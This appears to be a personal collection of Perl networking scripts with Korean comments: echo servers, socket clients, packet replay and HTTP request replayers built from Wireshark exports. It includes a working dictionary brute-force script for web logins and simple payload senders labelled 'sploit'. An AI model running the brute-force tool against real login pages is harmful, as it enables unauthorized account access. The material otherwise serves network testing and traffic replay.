applicationlayer

#!/usr/bin/perl
 
use IO::Socket;
 
sub connection {
    my ($a_sock) = @_;
 
    print $a_sock "        *** TCP ECHO SRV ***\n\n\r";
    while( defined($buf = <$a_sock>)) {
        print $a_sock $buf;
    }
    exit;
}
 
my $sock = new IO::Socket::INET (LocalHost => 'ANY',
                              LocalPort => 4242,
                              Proto => 'tcp',
                              Listen => 5,
                              Reuse => 1);
 
die "Unable to create Socket, error: $!" unless $sock;
 
print "Tcp server running\n";
 
sub REAPER {
    while(waitpid(-1,WNOHANG) > 0) { ; }
    $SIG{CHLD} = \&REAPER;
}
 
$SIG{CHLD} = \&REAPER;
 
my $a_sock;
 
while (1) {
    $a_sock = $sock->accept();
    if (defined($a_sock)) {
        my $pid = fork;
        if ($pid == 0) {
            connection($a_sock);
            exit(0);
        } else {
            close($a_sock);
        }
    }
}
 
close $sock;
 

http://www.tutorialspoint.com/perl/perl_socket.htm
##########server##########

#!/usr/bin/perl -w

# server.pl

#--------------------


use strict;

use Socket;


# use port 7890 as default

my $port = shift || 7890;

my $proto = getprotobyname('tcp');


# create a socket, make it reusable

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) 

   or die "Can't open socket $!\n";

setsockopt(SOCKET, SOL_SOCKET, SO_REUSEADDR, 1) 

   or die "Can't set socket option to SO_REUSEADDR $!\n";


# bind to a port, then listen

bind( SOCKET, pack( 'Sn4x8', AF_INET, $port, "\0\0\0\0" ))

       or die "Can't bind to port $port! \n";

listen(SOCKET, 5) or die "listen: $!";

print "SERVER started on port $port\n";


# accepting a connection

my $client_addr;

while ($client_addr = accept(NET_SOCKET, SOCKET)) {

	# send them a message, close connection

	print NEW_SOCKET "Smile from the server";

	close NEW_SOCKET;




}

##########client##########

#!/usr/bin/perl -w

# client.pl

#----------------


use strict;

use Socket;


# initialize host and port

my $host = shift || 'localhost';

my $port = shift || 7890;

my $server = "10.12.12.168";


# create the socket, connect to the port

socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2])

   or die "Can't create a socket $!\n";

connect( SOCKET, pack( 'Sn4x8', AF_INET, $port, $server ))

       or die "Can't connect to port $port! \n";


my $line;

while ($line = <SOCKET>) {

	print "$line\n";

}

close SOCKET or die "close: $!";

$ARGC=@ARGV;
if ($ARGC !=2) {
        print "Usage: $0 <host> <port>\n";
        print "Example: $0 192.168.1.153 80\n";
        exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = $ARGV[1];

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('UDP') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_DGRAM, $proto) or die "Error: $!";
#connect(SOCK, $paddr) or die "Error: $!";
connect(SOCK, $paddr);

$sploit="60198E081622F7BCC5489B";


print $sploit;
send(SOCK, $sploit,0 ) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

$ARGC=@ARGV;
if ($ARGC !=2) {
        print "Usage: $0 <host> <port>\n";
        print "Example: $0 192.168.1.210 445\n";
        exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = $ARGV[1];

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
#connect(SOCK, $paddr) or die "Error: $!";
connect(SOCK, $paddr);

$sploit="\x30\x30\x30";

print $sploit;
send(SOCK, $sploit,0 ) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

system("pg.exe");
print "\nSelect AdapterIndex:";
$interface = <STDIN>;
for($i=1321;$i<=1539;$i++)
{
  if($i<10)
  {$fileName = '000'.$i;}
  elsif($i<100)
  {$fileName = '00'.$i;}
  elsif($i<1000)
  {$fileName = '0'.$i;}
  else
  {
    $fileName = $i;
    }
  if(-e $fileName.".pl")
  {
    $fileName=$fileName.".pl";
    $filetype="pl";
  }
  elsif(-e $fileName.".cap")
  {
    $filetype="cap";
    $fileName=$fileName.".cap";
  }
  else
  {
    die "\n $fileName is not exist.\n";
  }
  if($filetype eq "pl")
  {
    system("perl $fileName");
    print "\n$fileName OK\n";
  }
  elsif($filetype eq "cap")
  {
    system("pg.exe $interface $fileName");
    print "\n$fileName OK\n";
  }
  $filetype="-";
#  $enter = <STDIN>; 
}
print "bye~\n";

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
$i=1;
while($i<646)
{
  $qu = 'http://server/index.asp?page='.$i;
  $req = HTTP::Request->new(GET => $qu);
  $res = $ua->request($req);
  $filename = 'page'.$i.'.html';
  open(FILE,"> $filename") || die "file open error\n";
  print FILE $res->content;
  close(FILE);
  print $i."page success\n";
  $i=$i+1;
}

파일 업로드시 패킷을 뜨기 위해서 간단한 스크립트를 이용할 수 있다.

  use HTTP::Request::Common;
  use LWP::UserAgent;
  $ua = LWP::UserAgent->new;LWP::UserAgent->new;
  my $req = POST 'http://[서버주소]',Content_Type => 'form-data',Content => [ info_file => ["파일명"] ];
  $ua->request($req);

3 way handshaking을 맺어야하므로 서버측에 80번 포트를 열어주어야 패킷이 나간다.

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
if( $#ARGV != 1 )
  { die "Usage: webbf.pl \"192.168.1.150/login.asp?id=TEST&pw=TEST\" [DICfilename]\n";}

$ARGV[0] =~ /([\w.\/]{1,30}\/\w{1,20}\.\w{1,4}\?)([\w=&]{1,100})=TEST&(\w{1,10})=TEST/;
$URL = $1;
$IDparam = $2;
$PWparam = $3;

$DicfileName = $ARGV[1];
open( fileHandle, $DicfileName ) || die "Cannot open $fileName.\n";

$attnum=1;


while($aLine =<fileHandle>)
{
    $aLine =~s/\r//;
    $aLine =~s/\n//;
    
    $ID = $aLine;
    $PW = $aLine;

  $bruteforce = 'http://'.$URL.$IDparam.'='.$ID.'&'.$PWparam.'='.$PW;
  $req = HTTP::Request->new(GET => $bruteforce);
  $res = $ua->request($req);
  print $attnum++.'.--->'.$bruteforce."\n";

  if($res->content !~/아이디가/)
 {
    print "bruteforce success\n\n\n\n";
    print $res->content;
    die "\n";
  }
}


웹 애플리케이션 로그인 dictionary attack공격
한번 요청시마다 일일이 다시 세션을 맺는데 이건 보완해야겠다.

  use HTTP::Request::Common qw(POST);
  use LWP::UserAgent;
  $ua = LWP::UserAgent->new;
  my $req = POST 'http://192.168.1.157',Content_Type => 'form-data',Content => [ search => 'www', errors => 0 ];
  $ua->request($req);


o>_<o

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
if( $#ARGV != 1 )
  { die "Usage: geturireq.pl [target IP] [FileName]\nEx: geturireq.pl 192.168.1.20 Query.txt\n"; }
$ipaddress = $ARGV[0];
$fileName = $ARGV[1] ;
if( -d $fileName )
  { die "$fileName is a directory.\n"; }
-e $fileName || die "$fileName is not exist.\n";
-T $fileName || die "$fileName is not a text file.\n";
open( fileHandle, $fileName ) || die "Cannot open $fileName.\n";
$i = 1;
while($aLine =<fileHandle>)
{
  if($aLine=~/(?<=GET\s).*(?=\sHTTP\/\d\.\d)/)
  {
  $qu = 'http://'.$ipaddress.$&;
  $req = HTTP::Request->new(GET => $qu);
  $res = $ua->request($req);
  print $i.'. '.$qu."\r\n";
  $i=$i+1;
  }
}

wireshark export packet details-All expanded 에 대한 파싱스크립트

 

* HTTP GET *

==========================================================================================

if( $#ARGV < 0 )
  { die "Supply a file name, please.\n"; }
if( $#ARGV > 0 )
  { die "Too many parameter.\n"; }

$fileName = shift( @ARGV );

if( -d $fileName )
  { die "$fileName is a directory.\n"; }

-e $fileName || die "$fileName is not exist.\n";

-T $fileName || die "$fileName is not a text file.\n";

open( fileHandle, $fileName ) || die "Cannot open $fileName.\n";
$matching = 0;
$i=1;
while($aLine =<fileHandle>)
{
  if($aLine =~/^\s*?GET \//)
  {
    print $i.'.'.$aLine;
    $i = $i+1;
  }
}
close(fileHandle);
==========================================================================================

 

* HTTP Header *

==========================================================================================

if( $#ARGV < 0 )
  { die "Supply a file name, please.\n"; }
if( $#ARGV > 0 )
  { die "Too many parameter.\n"; }

$fileName = shift( @ARGV );

if( -d $fileName )
  { die "$fileName is a directory.\n"; }

-e $fileName || die "$fileName is not exist.\n";

-T $fileName || die "$fileName is not a text file.\n";

open( fileHandle, $fileName ) || die "Cannot open $fileName.\n";
$matching = 0;
$i=0;
while($aLine =<fileHandle>)
{
  if($aLine =~/^\s{4}\\r\\n/)
  {

    $matching = 0;
  }
  if($matching == 1)
  {
    print $i.'.'.$aLine;

   }
  if($aLine =~/Request Version: HTTP\/1\./)
  {
    $matching = 1;
    $i = $i+1;
  }

}
close(fileHandle);

==========================================================================================

* HTTP GET *

==========================================================================================

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
if( $#ARGV != 1 )
  { die "Usage: geturireq.pl [target IP] [FileName]\nEx: geturireq.pl 192.168.1.20 Query.txt\n"; }
$ipaddress = $ARGV[0];
$fileName = $ARGV[1] ;
if( -d $fileName )
  { die "$fileName is a directory.\n"; }
-e $fileName || die "$fileName is not exist.\n";
-T $fileName || die "$fileName is not a text file.\n";
open( fileHandle, $fileName ) || die "Cannot open $fileName.\n";
$i = 1;
while($aLine =<fileHandle>)
{
  $qu = 'http://'.$ipaddress.$aLine;
  $req = HTTP::Request->new(GET => $qu);
  $res = $ua->request($req);
  print $i.'. '.$qu;
  $i=$i+1;
}

==========================================================================================

 

* HTTP Header *

==========================================================================================

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
if( $#ARGV != 1 )
  { die "Usage: geturireq.pl [target IP] [FileName]\nEx: geturireq.pl 192.168.1.20 Query.txt\n"; }
$ipaddress = $ARGV[0];
$fileName = $ARGV[1] ;
if( -d $fileName )
  { die "$fileName is a directory.\n"; }
-e $fileName || die "$fileName is not exist.\n";
-T $fileName || die "$fileName is not a text file.\n";
open( fileHandle, $fileName ) || die "Cannot open $fileName.\n";
$i = 1;
while($aLine =<fileHandle>)
{
   $aLine=~/[\w_-]{1,30}(?=:\s)/;
   $fieldname = $&;
  
   $aLine=~/(?<=[\w_-]{4}:\s).+/;
   $fielddata=$&;
  $qu = 'http://'.$ipaddress.'_'.$i;
  $req = HTTP::Request->new(GET => $qu);
  $req->header($fieldname=>$fielddata);
  $res = $ua->request($req);
print $i." OK!\r\n";
$i=$i+1;
print $fieldname."\r\n".$fielddata."\r\n";
}

==========================================================================================

 

* HTTP Post Data *

==========================================================================================

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
require HTTP::Request;
require HTTP::Response;
if( $#ARGV != 1 )
  { die "Usage: geturireq.pl [target IP] [FileName]\nEx: geturireq.pl 192.168.1.20 Query.txt\n"; }
$ipaddress = $ARGV[0];
$fileName = $ARGV[1] ;
if( -d $fileName )
  { die "$fileName is a directory.\n"; }

-e $fileName || die "$fileName is not exist.\n";

-T $fileName || die "$fileName is not a text file.\n";
open( fileHandle, $fileName ) || die "Cannot open $fileName.\n";
$i = 1;
while($aLine =<fileHandle>)
{
  $qu = 'http://'.$ipaddress.'/post_'.$i;
  $req = HTTP::Request->new(POST => $qu);
$req->content_type('application/x-www-form-urlencoded');
$req->content($aLine);
  $res = $ua->request($req);
  print $i."\x0d\x0a";
  $i=$i+1;
}

==========================================================================================